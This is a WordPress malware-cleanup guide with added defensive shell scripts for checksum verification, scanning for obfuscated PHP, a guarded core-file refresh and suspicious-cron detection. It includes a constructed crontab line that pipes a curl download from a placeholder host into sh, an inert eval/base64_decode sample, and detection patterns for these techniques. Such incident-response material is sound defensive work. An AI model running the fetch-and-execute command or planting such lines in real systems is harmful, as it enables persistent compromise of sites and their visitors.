WordPress Malware Removal: How to Manually Clean Your Hacked Site
Is your website redirecting to spam? Did your hosting provider suspend your account?
If you are reading this, you are likely in panic mode. Seeing your hard work compromised by hackers is stressful. Most generic advice on the internet will tell you to “just install a security plugin.”
While plugins are great for prevention, they often fail to clean a site that is already hacked. Advanced malware hides in your database, disguises itself as legitimate system files, or regenerates itself after you delete it.
In this guide, I will walk you through the Manual Core Refresh Protocol. This is the industry-standard method for cleaning file-based infections without breaking your site.
Step 1: Backup Before You Touch Anything
Do not skip this step.
We are about to modify core files and delete folders. If you make a mistake (like accidentally deleting your wp-config.php file), you could crash your site permanently. Even a backup of a hacked site is better than no backup at all—it gives you a safety net.
If you still have access to your WordPress dashboard, use a reliable plugin to save your data immediately:
- The Standard Method: UpdraftPlus is the industry standard for automated backups. Follow my guide on How to Back Up Your WordPress Site with UpdraftPlus (Step-by-Step 2025).
- The Migration Method: If you want a single-file export that is easy to move to a local environment for safe cleaning, check out How to Use All-in-One WP Migration to Back Up & Migrate Your Site.
Once your data is safe, we can start the surgery.
Step 2: Scan and Stop the Bleeding
Before you start deleting files, you need to know what you are dealing with. You must confirm whether this is a plugin conflict or an actual infection.
External Check
First, see how the world views your site. Use a free tool such as Sucuri SiteCheck or VirusTotal to see whether you are blacklisted by Google, McAfee, or Norton. This will tell you if your visitors are seeing a “Deceptive Site Ahead” warning.
Internal Scan
Install the free version of Wordfence. Go to Scan → Start New Scan.
Wordfence is excellent at comparing your core WordPress files against the official repository. It will highlight files that have been modified by hackers.
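The same comparison can be done by hand, which is useful when the dashboard is unusable or you do not trust a plugin running on an infected site. The script below is an added example, not code from the original post or from Wordfence: it checks wp-admin/ and wp-includes/ against a checksum manifest in the format `md5sum -c` reads and reports files that differ (MODIFIED), are listed but gone (MISSING), or exist without being listed (NOT IN MANIFEST, the usual home of dropped files). In practice the manifest for your installed version comes from the WordPress.org checksums API or from WP-CLI's `wp core verify-checksums`; here the manifest, the function names and the fixture directories are constructed so the example runs offline.

```shell
#!/bin/sh
# Added example (not code from the original post): compare the two core folders
# against a checksum manifest ("<md5>  <relative path>" per line, as md5sum -c reads).

check_core_integrity() {
    site="$1"; manifest="$2"
    # Modified or missing files: md5sum -c prints "<path>: FAILED" for each mismatch
    # and "<path>: FAILED open or read" for a listed file that no longer exists.
    ( cd "$site" && md5sum -c "$manifest" 2>/dev/null ) \
        | sed -n 's/: FAILED open or read$/ MISSING/p; s/: FAILED$/ MODIFIED/p'
    # Unexpected files: anything in the two core folders the manifest does not list.
    listed=$(mktemp)
    awk '{print $2}' "$manifest" | sort > "$listed"
    ( cd "$site" && find wp-admin wp-includes -type f | sort ) \
        | comm -13 "$listed" - | sed 's/$/ NOT IN MANIFEST/'
    rm -f "$listed"
}

# Constructed fixture: a "fresh" release tree, a manifest built from it, and a
# "site" copy with one tampered file and one extra file.
make_core_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/fresh/wp-admin" "$fx/fresh/wp-includes"
    echo '<?php // clean admin file (constructed)' > "$fx/fresh/wp-admin/index.php"
    echo '<?php // clean includes file (constructed)' > "$fx/fresh/wp-includes/version.php"
    ( cd "$fx/fresh" && find wp-admin wp-includes -type f -exec md5sum {} + ) > "$fx/manifest.md5"
    cp -R "$fx/fresh" "$fx/site"
    echo '// constructed tampering' >> "$fx/site/wp-admin/index.php"
    echo '<?php // constructed extra file' > "$fx/site/wp-includes/class-wp-constructed.php"
    printf '%s\n' "$fx"
}

FIXTURE=$(make_core_fixture)
check_core_integrity "$FIXTURE/site" "$FIXTURE/manifest.md5"
# -> wp-admin/index.php MODIFIED
# -> wp-includes/class-wp-constructed.php NOT IN MANIFEST
```

Generate the real manifest from a fresh download of the exact same WordPress version (`cd wordpress && find wp-admin wp-includes -type f -exec md5sum {} +`); a manifest from a different release will report every changed core file as modified.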
Step 3: Hunt Down Hidden Backdoors
Hackers don’t just break in once; they leave “keys” under the mat so they can come back later. These are called backdoors.
Check Your Source Code
Malware often hides in your theme’s header.php or footer.php files. You are looking for code that looks like random gibberish (obfuscated code). Look for suspicious functions like:
- eval
- base64_decode
- gzinflate
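Grepping for those names by hand produces noise, because `eval` also appears inside ordinary words such as `retrieval`. The function below is an added example, not code from the original post: it searches a theme folder for the three indicators only where they are used as a function call and prints file, line number and the offending line. The function names and the two sample theme files are constructed for the example; the indicator line in the sample decodes to the word "constructed" and does nothing.

```shell
#!/bin/sh
# Added example (not code from the original post): scan a theme folder for the
# three indicators listed above and print file:line:code for each hit.

scan_obfuscation() {
    # Match the name only when it is followed by "(" and not preceded by a word
    # character, so "retrieval" or "$evaluate" in clean code do not trigger hits.
    pattern='(^|[^A-Za-z0-9_$])(eval|base64_decode|gzinflate)[[:space:]]*\('
    # The /dev/null argument forces grep to print the file name even for one file.
    find "$1" -type f -name '*.php' -exec grep -nE "$pattern" /dev/null {} +
}

count_obfuscation_hits() {
    scan_obfuscation "$1" | wc -l | tr -d ' '
}

# Constructed sample theme: one clean file, one with an inert indicator line.
make_theme_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/theme"
    cat > "$fx/theme/header.php" <<'EOF'
<?php
// Clean file: "retrieval" contains "eval" but is not a call.
$retrieval = get_header();
EOF
    cat > "$fx/theme/footer.php" <<'EOF'
<?php
wp_footer();
eval(base64_decode("Y29uc3RydWN0ZWQ="));  // constructed: decodes to the word "constructed"
EOF
    printf '%s\n' "$fx"
}

FIXTURE=$(make_theme_fixture)
scan_obfuscation "$FIXTURE/theme"
# -> .../theme/footer.php:3:eval(base64_decode("Y29uc3RydWN0ZWQ="));  // constructed: ...
```

Point it at wp-content/themes first; a hit is a place to read, not proof of infection on its own, since a few legitimate plugins use `base64_decode` for encoded assets. Pointed at wp-content/uploads the same scan should return nothing at all, because no PHP belongs there.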
Check for Rogue Admin Users
Navigate to Users → All Users.
Hackers often create hidden administrator accounts to regain access. Look for usernames like:
- wp-support
- admin123
- 100100
- adm1nlxg1n
- adminbackup
If you see an administrator you didn’t create, delete it immediately.
Step 4: The Fix (Clean Core Files)
This is the most critical step. Instead of trying to pick out the malware line-by-line, we are going to replace your core system files with fresh, clean copies.
Warning: Follow these instructions carefully. One wrong click can delete your images or configuration.
- Download Fresh WordPress: Go to WordPress.org and download the latest .zip file. Extract it on your computer.
- Connect via FTP: Use a tool like FileZilla or your hosting File Manager.
- The Purge: Inside your server directory, DELETE the /wp-admin and /wp-includes folders.
- The Protection: DO NOT delete the /wp-content folder (this holds your uploads and themes) and DO NOT delete wp-config.php (this connects your site to the database).
- The Refresh: Upload the clean /wp-admin and /wp-includes folders from the fresh zip file you downloaded earlier.
This process eliminates 80% of file-based malware instantly because you are physically removing the infected system files and replacing them with sterile ones.
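For a site you can reach over SSH, the five steps above can be run as one script that refuses to act unless the paths look right. The script below is an added example, not code from the original post: SITE is the WordPress root on the server and FRESH is the extracted `wordpress` folder from the zip you downloaded. It backs up the old core folders first (Step 1), deletes exactly /wp-admin and /wp-includes, copies the clean ones in, and never touches /wp-content or wp-config.php. The function name and the fixture directories are constructed for the example.

```shell
#!/bin/sh
# Added example (not code from the original post): the core refresh as one
# script with guard rails. Usage: core_refresh /path/to/site /path/to/fresh/wordpress

core_refresh() {
    site="$1"; fresh="$2"
    # Guard: only operate on something that looks like a WordPress root, so a
    # mistyped path cannot lead to deleting folders somewhere else.
    [ -f "$site/wp-config.php" ] || { echo "refusing: $site/wp-config.php not found" >&2; return 1; }
    [ -d "$site/wp-content" ]    || { echo "refusing: $site/wp-content not found" >&2; return 1; }
    # Guard: the fresh copy must actually contain both core folders.
    [ -d "$fresh/wp-admin" ] && [ -d "$fresh/wp-includes" ] \
        || { echo "refusing: $fresh is not an extracted WordPress release" >&2; return 1; }
    # Step 1 of the post: back up before touching anything. Only the two folders
    # about to be removed are archived; wp-content and wp-config.php stay untouched.
    backup="$site/../core-backup-$(date +%Y%m%d%H%M%S).tar"
    tar -cf "$backup" -C "$site" wp-admin wp-includes \
        || { echo "refusing: backup to $backup failed" >&2; return 1; }
    # The Purge: exactly the two core folders, nothing else.
    rm -rf "$site/wp-admin" "$site/wp-includes"
    # The Refresh: copy the clean folders from the fresh release.
    cp -R "$fresh/wp-admin" "$fresh/wp-includes" "$site/"
    echo "core refreshed; old core folders saved to $backup"
}

# Constructed fixture: a site with a stray file inside wp-includes, plus a
# minimal "fresh" release tree.
make_site_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/site/wp-admin" "$fx/site/wp-includes" "$fx/site/wp-content/uploads" \
             "$fx/fresh/wp-admin" "$fx/fresh/wp-includes"
    echo '<?php define("DB_NAME", "constructed");' > "$fx/site/wp-config.php"
    echo 'constructed image bytes' > "$fx/site/wp-content/uploads/photo.jpg"
    echo '<?php // constructed stray file inside a core folder' > "$fx/site/wp-includes/constructed-stray.php"
    echo '<?php // clean (constructed)' > "$fx/fresh/wp-admin/index.php"
    echo '<?php // clean (constructed)' > "$fx/fresh/wp-includes/version.php"
    printf '%s\n' "$fx"
}

FIXTURE=$(make_site_fixture)
core_refresh "$FIXTURE/site" "$FIXTURE/fresh"
ls "$FIXTURE/site" "$FIXTURE/site/wp-includes"
```

The script replaces the two core folders only, exactly as the list above describes; WordPress also ships root-level files such as wp-login.php and wp-settings.php, which it leaves in place, so check those against the clean download separately.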
Step 5: Troubleshooting Specific Symptoms
The Core Refresh fixes the foundation, but malware often infects specific plugins or themes, or creates ghost files. Depending on your symptoms, check these specific guides I have written:
1. Is your site redirecting to other websites?
This is the most common symptom. Hackers inject JavaScript to send your traffic to scam sites or spam pages.
- If your site is sending users to a “getfix” domain, read my guide on Detecting and Removing getfix[.]win Redirects.
- If you see content from completely different websites appearing on yours, check out Why Is My Website Showing Content From Another Site?.
- Sometimes, the redirection logic is hidden deep in your server settings. Here is how to handle Redirections Hidden in .htaccess files.
2. Do you have strange files or backdoors?
If the malware keeps returning, you likely missed a backdoor file.
- Hackers often hide backdoors in fake plugins. A common one recently is the WP-Compat Plugin Backdoor.
- Sometimes they hide in your uploads folder disguised as legitimate files. Learn how to spot Cookie-Based PHP Backdoors.
- Are you seeing a user named “admnlxgxn”? This is a specific signature of a known hack. Here is how to spot and clean it.
3. Are you a victim of SEO Spam?
This is when hackers inject thousands of pages into your site to sell fake products (often targeting Japanese-language or pharmaceutical keywords).
- If your search results are filled with Japanese characters, read my Complete Guide to the Japanese Keyword Hack.
- We recently cleared 242,000 spam pages from a single site. Read the case study on Recovering from SEO Spam here.
- You might also find hidden links buried in your text meant to boost the hacker’s SEO rankings. Here is the guide to Hidden Links Malware.
4. JavaScript and AdSense Infections
Modern malware often targets your visitors’ browsers directly using malicious JavaScript.
- If your visitors are complaining about pop-ups or mobile redirects, you might be dealing with Dangerous JavaScript Malware.
- Sometimes malicious scripts infect every single .js file on your server. Here is a Step-by-Step Virus Removal Guide for infected .js files.
- Running ads? Watch out for Fake Google AdSense Malware that steals your ad revenue.
5. Domain Deactivation & Drive-By Warnings
Sometimes the issue isn’t just a redirect; your domain registrar might actually suspend your domain to protect the public from “Drive-By” downloads (malware that downloads automatically to a visitor’s computer).
- If you have received a suspension notice from a registrar like SWITCH (common for .ch and .li domains), or warnings about drive-by attacks, you need to act immediately to get back online.
- Read the fix: How to Remove “Drive-By” Malware & Fix a SWITCH Domain Deactivation Warning.
Why Does Malware Keep Coming Back?
You cleaned the files, but the site got hacked again the next day. Why?
Usually, this is due to a Cron Job. Hackers set up a scheduled task on your server that automatically re-downloads the virus if you delete it. I explain exactly how this works in my post: Why Malware Keeps Coming Back (Hidden Cron Job Hack Explained).
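A quick way to spot such a job is to read every crontab on the server (the web user's, root's and /etc/cron.d) and flag lines that download and execute something. The function below is an added example, not code from the original post: it reads a crontab listing on stdin and prints the line number of any entry that pipes a download tool into a shell or interpreter, decodes base64 inline, or runs from /tmp or wp-content/uploads. The indicator list and the sample crontab are constructed for the example.

```shell
#!/bin/sh
# Added example (not code from the original post): flag crontab lines matching
# the re-download pattern described above. Usage: crontab -l | flag_suspicious_cron

flag_suspicious_cron() {
    # Indicators: a download tool feeding a shell or interpreter, an inline base64
    # decode, or a job executing from /tmp, /dev/shm or wp-content/uploads (where
    # no PHP should ever run). Comment lines are dropped from the output.
    grep -nE '(curl|wget).*(\||[[:space:]](sh|bash|php|python)[[:space:]])|base64[[:space:]]+(-d|--decode)|/tmp/|/dev/shm/|wp-content/uploads/[^[:space:]]*\.php' \
        | grep -vE '^[0-9]+:[[:space:]]*#'
}

count_suspicious_cron() {
    printf '%s\n' "$1" | flag_suspicious_cron | wc -l | tr -d ' '
}

# Constructed crontab: two legitimate jobs and one re-download job.
CONSTRUCTED_CRONTAB='# constructed crontab for the example
0 3 * * * /usr/bin/php /var/www/html/wp-cron.php >/dev/null 2>&1
*/5 * * * * curl -s http://example.invalid/constructed | sh
30 2 * * 1 /usr/local/bin/backup-site.sh >/dev/null 2>&1'

printf '%s\n' "$CONSTRUCTED_CRONTAB" | flag_suspicious_cron
# -> 3:*/5 * * * * curl -s http://example.invalid/constructed | sh
```

Treat a hit as something to read, not to delete blindly: a legitimate deployment job can also call curl. Note that WordPress has its own scheduler (WP-Cron, stored in the database rather than in the system crontab); WP-CLI's `wp cron event list` shows those entries, and they deserve the same review.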
Final Thoughts: Security Hardening
Once your files are clean, you must lock the doors.
- Update Everything: WordPress core, themes, and plugins.
- Change Passwords: Database, FTP, and WordPress Admin.
- Check WooCommerce: If you run a store, ensure your checkout page wasn’t capturing credit card data. Read about WooCommerce Checkout Malware here.
Don’t want to touch the code?
Deleting core files can be scary. One wrong move can take your site offline permanently. If you are uncomfortable using FTP or editing PHP files, I can handle the full manual cleanup and security hardening for you.
